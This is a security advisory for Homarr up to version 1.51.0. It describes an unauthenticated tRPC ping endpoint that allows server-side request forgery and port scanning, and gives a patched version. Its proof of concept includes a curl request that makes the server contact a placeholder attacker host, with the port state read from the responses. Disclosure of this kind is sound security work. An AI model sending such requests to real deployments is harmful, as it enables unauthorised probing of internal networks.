Skip to content

Unauthenticated SSRF / Port-Scan Primitive via widget.app.ping

Moderate
Meierschlumpf published GHSA-c6rh-8wj4-gv74 Feb 6, 2026

Package

homarr-labs/homarr (Docker image)

Affected versions

<= 1.51.0

Patched versions

>= 1.52.0

Description

Summary

A public (unauthenticated) tRPC endpoint widget.app.ping accepts an arbitrary url and performs a server-side request to that URL. This allows an unauthenticated attacker to trigger outbound HTTP requests from the Homarr server, enabling SSRF behavior and a reliable port-scanning primitive (open vs closed ports can be inferred from statusCode vs fetch failed and timing).

Details

The procedure is implemented in:

  • packages/api/src/router/widgets/app.ts as ping: publicProcedure.input(z.object({ url: z.string() })).query(...)

It calls sendPingRequestAsync(input.url) (server-side fetch) and returns:

  • statusCode and durationMs on success
  • an error (e.g., fetch failed) on failure

Because the procedure is publicProcedure, the functionality is reachable without authentication and can be abused by any network user who can reach the Homarr instance.

Proof of Concept (PoC)

  1. Start a simple HTTP server on an attacker-controlled host:
python3 -m http.server 8080
  1. From any machine that can reach the Homarr API, call the ping endpoint (no auth required):
curl -sG 'http://<HOMARR_HOST>:7575/api/trpc/widget.app.ping' \
  -H 'trpc-accept: application/jsonl' \
  --data-urlencode 'batch=1' \
  --data-urlencode 'input={"0":{"json":{"url":"http://<ATTACKER_HOST>:8080/test"}}}'
  1. Observe:

  • Homarr returns statusCode/durationMs when the port is open and reachable.

  • Homarr returns error: "fetch failed" when the port is closed/unreachable.

Example results:

  • Open port → {"statusCode":404,"durationMs":...}

  • Closed port → {"error":"fetch failed"}

Also confirmed by web server logs showing requests originating from the Homarr server IP.

Impact

This allows:

  • Server-side request forgery (SSRF-like behavior): Homarr can be forced to make outbound requests to arbitrary hosts.

  • Port-scanning primitive from the Homarr network perspective (distinguish reachable services).

  • Potential access to internal-only services (e.g., 127.0.0.1 / RFC1918 / cluster network), depending on deployment.

  • Potential side effects if internal endpoints perform actions on GET requests.

Severity

Moderate

CVSS overall score

This score calculates overall vulnerability severity from 0 to 10 and is based on the Common Vulnerability Scoring System (CVSS).
/ 10

CVSS v3 base metrics

Attack vector
Network
Attack complexity
Low
Privileges required
None
User interaction
None
Scope
Unchanged
Confidentiality
Low
Integrity
None
Availability
None

CVSS v3 base metrics

Attack vector: More severe the more the remote (logically and physically) an attacker can be in order to exploit the vulnerability.
Attack complexity: More severe for the least complex attacks.
Privileges required: More severe if no privileges are required.
User interaction: More severe when no user interaction is required.
Scope: More severe when a scope change occurs, e.g. one vulnerable component impacts resources in components beyond its security scope.
Confidentiality: More severe when loss of data confidentiality is highest, measuring the level of data access available to an unauthorized user.
Integrity: More severe when loss of data integrity is the highest, measuring the consequence of data modification possible by an unauthorized user.
Availability: More severe when the loss of impacted component availability is highest.
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N

CVE ID

CVE-2026-25123

Weaknesses

Server-Side Request Forgery (SSRF)

The web server receives a URL or similar request from an upstream component and retrieves the contents of this URL, but it does not sufficiently ensure that the request is being sent to the expected destination. Learn more on MITRE.

Credits